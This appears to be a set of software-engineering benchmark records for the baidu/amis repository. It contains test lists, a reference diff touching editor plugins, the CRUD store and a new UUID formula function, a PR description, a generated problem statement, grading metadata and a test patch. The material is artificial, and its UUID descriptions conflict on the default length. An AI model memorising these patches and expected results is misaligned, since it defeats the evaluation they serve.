class="cxd-ImageField cxd-ImageField--thumb" + style="transform: scale(1);" > <div class="cxd-Image cxd-Image--thumb"
[ "evalute:UUID" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "async-evalute:namespace" ]
Method: UUID(length?: number) → string Location: packages/amis-formula/src/evalutor.ts (Evaluator class) Inputs: - length (optional, number) – Desired length of the generated UUID string. If omitted, defaults to 36 characters. Outputs: - Returns a UUID‑like string (hex characters with hyphens) truncated or padded to the specified length. Description: Generates a UUID string. The length parameter controls how many characters of the UUID are returned (maximum 36). Used in the formula evaluator as the function `${UUID()}` or `${UUID(8)}`. Function: Image (props) Location: packages/amis/src/renderers/Image.tsx (ImageField component) Inputs: - src: string – Thumbnail image URL (required). - originalSrc?: string – URL of the original image for preview. - enlargeAble?: boolean – Whether the image can be enlarged. - enlargeTitle?: string – Title shown in the preview dialog. - enlargeCaption?: string – Caption shown in the preview dialog. - enlargeWithGallary?: boolean – If true (default) shows all images in gallery mode when previewed from a table. - showToolbar?: boolean – Show toolbar in preview mode. - toolbarActions?: ImageAction[] – List of toolbar actions (rotate, zoom, etc.). - maxScale?: number | string – Maximum allowed zoom percentage for the “zoom” action (default 200). - minScale?: number | string – Minimum allowed zoom percentage for the “zoom” action (default 50). - onEvent?: { click?: {actions: ActionObject[]}, mouseenter?: {actions: ActionObject[]}, mouseleave?: {actions: ActionObject[]} } – Event map allowing actions to be dispatched on click, mouse‑enter, and mouse‑leave. - onClick?: (event: React.MouseEvent, props: any) | string | Function – Shortcut click handler (used via onEvent internally). - Other standard image props (className, width, height, title, placeholder, etc.). Outputs: - Renders an image thumbnail. Clicking opens a preview dialog if `enlargeAble` is true. Actions “preview” and “zoom” can be triggered externally via component actions. 
Description: Enhanced image renderer that now supports click/mouseenter/mouseleave events, preview action, and zoom action with configurable scaling limits. Component: Transfer (props) Location: packages/amis-ui/src/components/Transfer.tsx (Transfer component) Inputs: - source: string | API – Data source for left options (can include `${page}` and `${perPage}` placeholders for pagination). - options?: Option[] – Static left‑side options. - value?: any[] – Currently selected values. - onChange?: (value: any[]) => void – Callback when selection changes. - pagination?: { enable: boolean, // Turn on pagination for the left list. className?: string, // CSS class for the pagination container. layout?: string | string[], // Order of pagination parts (e.g., ["pager","perpage","total"]). perPageAvailable?: number[], // Options for items‑per‑page selector. maxButtons?: number, // Max number of page buttons (min 5). Default 5. popOverContainerSelector?: string, // Selector for the pop‑over container when pagination is rendered inside a pop‑over. // Internal fields populated from the data source (not set by the user): page?: number, // Current page number (derived from data source). perPage?: number, // Current page size (derived from data source). total?: number // Total item count (derived from data source). } - onPageChange?: (page: number, perPage?: number, direction?: 'forward' | 'backward') => void – Fires when the user changes page or page size. Outputs: - Renders left and right panels with selectable items. When `pagination.enable` is true, a pagination footer appears below the left panel. Changing pages triggers `onPageChange` and loads the next slice of options from the source. Description: Transfer control now supports paginated left‑side options, with configuration via the `pagination` prop and a callback to react to page changes. It also accumulates loaded options for proper right‑panel rendering across pages.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 65, "num_modified_lines": 2247, "pr_author": "lurunze1226", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1074-R1083", "https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1093-R1096" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh" ], "reason": null, "reasoning": "The issue only mentions adding three new options to InputTable's schema, but the supplied test patch modifies many unrelated test files, documentation, and component code across the repository, which does not align with the stated intent. This mismatch indicates that the patch contains unrelated changes, a classic case of PATCH_ARTIFACTS (B5). The issue description lacks detailed acceptance criteria, making the intent incomplete. The tests are not aligned with the feature request, and the primary problem is the extraneous test changes.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests modify many unrelated components (CRUD, Image, Table, etc.) 
instead of focusing on InputTable", "Added tests for new features not described in the issue (e.g., UUID, pagination, image events)", "Documentation and mock files unrelated to InputTable are altered" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f9ef0497960713963a42f9f52b63d18fcf1bf9f8
2023-11-07 03:35:48
github-actions[bot]: <!-- Labeler (https://github.com/jimschubert/labeler) --> 👍 Thanks for this! 🏷 I have applied any labels matching special text in your issue. Please review the labels and make any necessary changes.
baidu__amis-8641
diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index 3eb535c6d..d213b5f28 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -161,10 +161,10 @@ export const CRUDStore = ServiceStore.named('CRUDStore') rule => rule.includes(lhs) && rule.includes(rhs) ) ) { - return lhs === rhs; + return lhs !== rhs; } - return lhs == rhs; + return lhs != rhs; }) ) { if (query[pageField || 'page']) { diff --git a/packages/amis-editor-core/src/plugin.ts b/packages/amis-editor-core/src/plugin.ts index 30174d640..f690c34eb 100644 --- a/packages/amis-editor-core/src/plugin.ts +++ b/packages/amis-editor-core/src/plugin.ts @@ -304,7 +304,9 @@ export interface RendererInfo extends RendererScaffoldInfo { sharedContext?: Record<string, any>; dialogTitle?: string; //弹窗标题用于弹窗大纲的展示 dialogType?: string; //区分确认对话框类型 - subEditorVariable?: Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 + getSubEditorVariable?: ( + schema?: any + ) => Array<{label: string; children: any}>; // 传递给子编辑器的组件自定义变量,如listSelect的选项名称和值 } export type BasicRendererInfo = Omit< @@ -1051,7 +1053,7 @@ export abstract class BasePlugin implements PluginInterface { isListComponent: plugin.isListComponent, rendererName: plugin.rendererName, memberImmutable: plugin.memberImmutable, - subEditorVariable: plugin.subEditorVariable + getSubEditorVariable: plugin.getSubEditorVariable }; } } diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index ba099172a..cceedf751 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1224,7 +1224,10 @@ export async function resolveVariablesFromScope(node: any, manager: any) { // 子编辑器内读取的host节点自定义变量,非数据域方式,如listSelect的选项值 let hostNodeVaraibles = []; if (manager?.store?.isSubEditor) { - hostNodeVaraibles = manager.config?.hostNode?.info?.subEditorVariable || []; + hostNodeVaraibles = + 
manager.config?.hostNode?.info?.getSubEditorVariable?.( + manager.config?.hostNode.schema + ) || []; } const variables: VariableItem[] = diff --git a/packages/amis-editor/src/plugin/Calendar.tsx b/packages/amis-editor/src/plugin/Calendar.tsx index 7f854725c..d4695e697 100644 --- a/packages/amis-editor/src/plugin/Calendar.tsx +++ b/packages/amis-editor/src/plugin/Calendar.tsx @@ -20,7 +20,7 @@ export class CalendarPlugin extends BasePlugin { panelTitle = '日历日程'; description = '展示日历及日程。'; - docLink = '/amis/zh-CN/components/calendor'; + docLink = '/amis/zh-CN/components/calendar'; tags = ['展示']; scaffold = { diff --git a/packages/amis-editor/src/plugin/Form/ListSelect.tsx b/packages/amis-editor/src/plugin/Form/ListSelect.tsx index c6574400a..e97724ca8 100644 --- a/packages/amis-editor/src/plugin/Form/ListSelect.tsx +++ b/packages/amis-editor/src/plugin/Form/ListSelect.tsx @@ -109,21 +109,26 @@ export class ListControlPlugin extends BasePlugin { } ]; - subEditorVariable: Array<{label: string; children: any}> = [ - { - label: '当前选项', - children: [ - { - label: '选项名称', - value: 'label' - }, - { - label: '选项值', - value: 'value' - } - ] - } - ]; + getSubEditorVariable(schema: any): Array<{label: string; children: any}> { + let labelField = schema?.labelField || 'label'; + let valueField = schema?.valueField || 'value'; + + return [ + { + label: '当前选项', + children: [ + { + label: '选项名称', + value: labelField + }, + { + label: '选项值', + value: valueField + } + ] + } + ]; + } panelBodyCreator = (context: BaseEventContext) => { return formItemControl( @@ -201,7 +206,7 @@ export class ListControlPlugin extends BasePlugin { body: [ { type: 'tpl', - tpl: `\${${this.getDisplayField(value)}}`, + tpl: `\${${this.getDisplayField(data)}}`, wrapperComponent: '', inline: true } @@ -275,16 +280,7 @@ export class ListControlPlugin extends BasePlugin { } getDisplayField(data: any) { - if ( - data.source || - (data.map && - Array.isArray(data.map) && - data.map[0] && - 
Object.keys(data.map[0]).length > 1) - ) { - return data.labelField ?? 'label'; - } - return 'label'; + return data?.labelField ?? 'label'; } editDetail(id: string, field: string) { diff --git a/packages/amis-editor/src/plugin/SwitchContainer.tsx b/packages/amis-editor/src/plugin/SwitchContainer.tsx index 05dd08adc..1852a11f4 100644 --- a/packages/amis-editor/src/plugin/SwitchContainer.tsx +++ b/packages/amis-editor/src/plugin/SwitchContainer.tsx @@ -321,6 +321,7 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { name: 'items', label: '状态列表', addTip: '新增组件状态', + minLength: 1, items: [ { type: 'input-text', @@ -356,6 +357,10 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { title: '外观', className: 'p-none', body: getSchemaTpl('collapseGroup', [ + getSchemaTpl('theme:base', { + collapsed: false, + extra: [] + }), { title: '布局', body: [ @@ -460,7 +465,15 @@ export class SwitchContainerPlugin extends LayoutBasePlugin { getSchemaTpl('layout:stickyPosition') ] }, - ...getSchemaTpl('theme:common', {exclude: ['layout']}) + { + title: '自定义样式', + body: [ + { + type: 'theme-cssCode', + label: false + } + ] + } ]) }, { diff --git a/packages/amis-editor/src/renderer/ListItemControl.tsx b/packages/amis-editor/src/renderer/ListItemControl.tsx index 4754bf48c..26117f8bf 100644 --- a/packages/amis-editor/src/renderer/ListItemControl.tsx +++ b/packages/amis-editor/src/renderer/ListItemControl.tsx @@ -7,7 +7,7 @@ import {findDOMNode} from 'react-dom'; import cx from 'classnames'; import get from 'lodash/get'; import Sortable from 'sortablejs'; -import {FormItem, Button, Icon, render as amisRender} from 'amis'; +import {FormItem, Button, Icon, render as amisRender, toast} from 'amis'; import {autobind} from 'amis-editor-core'; import type {Option} from 'amis'; import {createObject, FormControlProps} from 'amis-core'; @@ -30,7 +30,6 @@ export type SourceType = 'custom' | 'api' | 'apicenter' | 'variable'; export interface OptionControlState { items: 
Array<PlainObject>; - api: SchemaApi; labelField: string; valueField: string; } @@ -50,7 +49,6 @@ export default class ListItemControl extends React.Component< this.state = { items: this.transformOptions(props), - api: props.data.source, labelField: props.data.labelField || 'title', valueField: props.data.valueField }; @@ -173,6 +171,12 @@ export default class ListItemControl extends React.Component< */ handleDelete(index: number) { const items = this.state.items.concat(); + const minLength = this.props.minLength; + + if (minLength > 0 && items.length <= minLength) { + toast.warning(`列表项数目不能少于${minLength}`); + return; + } items.splice(index, 1); this.setState({items}, () => this.onChange()); diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * 
@example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +} diff --git a/packages/amis-ui/src/components/Range.tsx b/packages/amis-ui/src/components/Range.tsx index 333110fed..a074df720 100644 --- a/packages/amis-ui/src/components/Range.tsx +++ b/packages/amis-ui/src/components/Range.tsx @@ -383,11 +383,16 @@ export class Range extends React.Component<RangeItemProps, any> { getStepValue(value: number, step: number) { const surplus = value % step; let result = 0; + let closeNum = Math.floor(value - (value % step)); // 余数 >= 步长一半 -> 向上取 // 余数 < 步长一半 -> 向下取 const _value = surplus >= step / 2 ? value : safeSub(value, step); while (result <= _value) { - result = safeAdd(result, step); + if (step < 1 || result === 0 || result === closeNum) { + result = safeAdd(result, step); + } else { + result = closeNum; + } } return result; } diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 570985640..2c1094b92 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -2218,7 +2218,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { toolbar.align || (type === 'pagination' ? 'right' : 'left'); return ( <div - key={index} + key={toolbar.id || index} className={cx( 'Crud-toolbar-item', align ? 
`Crud-toolbar-item--${align}` : '', diff --git a/packages/amis/src/renderers/Each.tsx b/packages/amis/src/renderers/Each.tsx index a5234d45a..f66f0792f 100644 --- a/packages/amis/src/renderers/Each.tsx +++ b/packages/amis/src/renderers/Each.tsx @@ -1,5 +1,12 @@ import React from 'react'; -import {Renderer, RendererProps, buildStyle, isPureVariable} from 'amis-core'; +import { + CustomStyle, + Renderer, + RendererProps, + buildStyle, + isPureVariable, + setThemeClassName +} from 'amis-core'; import {Schema} from 'amis-core'; import {resolveVariable, resolveVariableAndFilter} from 'amis-core'; import {createObject, getPropValue, isObject} from 'amis-core'; @@ -96,7 +103,11 @@ export default class Each extends React.Component<EachProps> { indexKeyName, placeholder, classnames: cx, - translate: __ + translate: __, + env, + id, + wrapperCustomStyle, + themeCss } = this.props; const value = getPropValue(this.props, props => @@ -124,7 +135,14 @@ export default class Each extends React.Component<EachProps> { } return ( - <div className={cx('Each', className)} style={buildStyle(style, data)}> + <div + className={cx( + 'Each', + className, + setThemeClassName('baseControlClassName', id, themeCss) + )} + style={buildStyle(style, data)} + > {Array.isArray(arr) && arr.length && items ? 
( arr.map((item: any, index: number) => ( <EachItem @@ -144,6 +162,20 @@ export default class Each extends React.Component<EachProps> { {render('placeholder', __(placeholder))} </div> )} + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/SwitchContainer.tsx b/packages/amis/src/renderers/SwitchContainer.tsx index 62d8f598a..7aad5492c 100644 --- a/packages/amis/src/renderers/SwitchContainer.tsx +++ b/packages/amis/src/renderers/SwitchContainer.tsx @@ -80,7 +80,7 @@ export default class SwitchContainer extends React.Component< componentDidUpdate(preProps: SwitchContainerProps) { const items = this.props.items || []; - if (this.state.activeIndex >= 0 && !items[this.state.activeIndex]) { + if (this.state.activeIndex > 0 && !items[this.state.activeIndex]) { this.setState({ activeIndex: 0 });
fix(amis-editor): Calendar文档链接拼写错误 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> Fixed a typo in the `docLink` property of the `CalendarPlugin` class in `Calendar.tsx`. This ensures that the plugin's documentation link works as expected. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> > _`docLink` was wrong_ > _Calendar spelling fixed_ > _Spring of clarity_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 3d11208</samp> * Fix the `docLink` property of the `CalendarPlugin` class to use the correct spelling of `calendar` in the URL ([link](https://github.com/baidu/amis/pull/8641/files?diff=unified&w=0#diff-aa42249f05b7b76df59f07697b763b6f6657b8ff0de5393b5a160dddd4edd284L23-R23)). This improves the documentation and user experience of the plugin.
**Title** Multiple stability and usability fixes across editor plugins, core stores and UI components **Problem** - Several components and utilities exhibited incorrect behavior: typo in a documentation link, faulty equality checks in the CRUD store, missing support for dynamic sub‑editor variables, inadequate validation of list item counts, and theming inconsistencies. - A new text‑function (UUID) was referenced but not implemented, and minor UI glitches existed in range calculations, toolbar keys, and switch container state handling. **Root Cause** - Inaccurate logic and hard‑coded data structures in core stores and plugins, lack of a functional API for variable extraction, and missing implementations for newly documented features. **Fix / Expected Behavior** - Correct the documentation URL for the calendar plugin. - Reverse the equality logic in the CRUD store to properly detect changes. - Replace the static sub‑editor variable definition with a callable API, allowing schema‑driven variable names and updating all consumers. - Enforce a minimum item count in list controls and provide user feedback when deletion would violate this rule. - Introduce a fully documented UUID generation function with configurable length. - Refine range step rounding, ensure unique keys for CRUD toolbar items, and apply proper theming class names in the `Each` renderer. - Add UI enhancements to SwitchContainer (mandatory item count, theme configuration, custom CSS) and adjust active‑index handling to avoid unnecessary resets. **Risk & Validation** - Changing the sub‑editor variable API may affect existing plugins; verify backward compatibility through unit tests and manual plugin checks. - New UUID logic must respect length limits and not break existing formula evaluations; add tests for default and custom lengths. - UI changes (minLength, theming, key handling) should be validated in the editor and runtime environments to ensure no regressions in layout or interaction.
8,641
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,11 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + expect(evaluate('${UUID()}', {}).length).toBe(32); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2'); diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index 043ea6389..1f5aae08c 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -20,6 +20,7 @@ * 17. api 返回格式支持取对象中的第一个数组 * 18. CRUD 事件 * 19. fetchInitData silent 静默请求 + * 20. CRUD表头查询字段更新后严格比较场景 */ import { @@ -1046,9 +1047,8 @@ test('17. should use the first array item in the response if provided', async () ) ); - waitFor(() => { - expect(container.querySelectorAll('tbody>tr').length).toBe(2); - }); + await wait(200); + expect(container.querySelectorAll('tbody>tr').length).toBe(2); }); describe('18. inner events', () => { @@ -1149,3 +1149,169 @@ test('19. fetchInitData silent true', async () => { expect(notify).toBeCalledTimes(1); }); }); + +test('20. 
CRUD filters contain fields that modification inspection should use strict mode', async () => { + let keyword; + const mockFetcher = jest.fn().mockImplementation((req) => { + /** mock.calls[0][0]拿不到filter里的参数,先用闭包测试吧 */ + keyword = req.data.version; + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: 0, + items: [] + } + } + }) + }); + const {container} = render( + amisRender( + { + type: 'page', + body: [ + { + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": { + "method": "post", + "url": "/api/mock/crud" + }, + "filter": { + "body": [ + { + "type": "select", + "name": "version", + "label": "version", + "clearable": true, + "options": [ + {"label": "0", "value": 0}, + {"label": "1", "value": 1}, + {"label": "true", "value": true}, + {"label": "false", "value": false}, + {"label": "emptyString", "value": ''}, + {"label": "stringZero", "value": '0'}, + {"label": "stringOne", "value": '1'} + ] + } + ], + "actions": [ + { + "type": "submit", + "label": "SubmitBtn", + "primary": true + } + ] + }, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "version", + "label": "Engine version engine" + } + ], + } + ] + }, + {}, + makeEnv({fetcher: mockFetcher}) + ) + ); + + const select = container.querySelector('.cxd-Select')!; + const submitBtn = container.querySelector("button[type='submit']")!; + + fireEvent.click(select); + await wait(200); + let options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 从 0 -> false 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = 
container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[4]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(''); + + /** 从 '' -> 0 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 切换到1 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[1]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(1); + + /** 从 1 -> true 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[2]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(true); + + /** 从 true -> '1' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[6]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('1'); + + /** 切换到false */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '0' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[5]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('0'); +}, 7000);
[ "evalute:UUID" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(self, length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: Optional numeric `length` (clamped to the range 0‑32, default 32) indicating the desired length of the returned UUID string. Outputs: `string` – a randomly generated UUID string trimmed to the requested length (hex characters, using the internal `uuidv4` helper). Description: Generates a random UUID string for use in formula evaluation via the `UUID()` function; when a length argument is provided the UUID is truncated accordingly.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 14, "num_modified_lines": 161, "pr_author": "chengjinyang0", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/baidu/amis/pull/8641/files?diff=unified&w=0#diff-aa42249f05b7b76df59f07697b763b6f6657b8ff0de5393b5a160dddd4edd284L23-R23" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "documentation_enh" ], "reason": null, "reasoning": "The issue requests fixing a typo in the CalendarPlugin's docLink URL. The required change is a single string correction, which aligns with the described behavior. However, the provided test patch adds many unrelated tests (UUID, CRUD strict mode, etc.) that are not mentioned in the issue, indicating that the patch bundles extra test changes unrelated to the fix. This is a patch artifact problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests for UUID function in amis-formula are unrelated to the Calendar docLink typo.", "Extended CRUD filter strict mode test does not pertain to the documentation link.", "Various UI component adjustments (theme, range, each, switch container) are unrelated to the issue." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
e7f23c9859cec2bad56dbd11a4b12615798141c8
2023-11-08 08:52:54
baidu__amis-8662
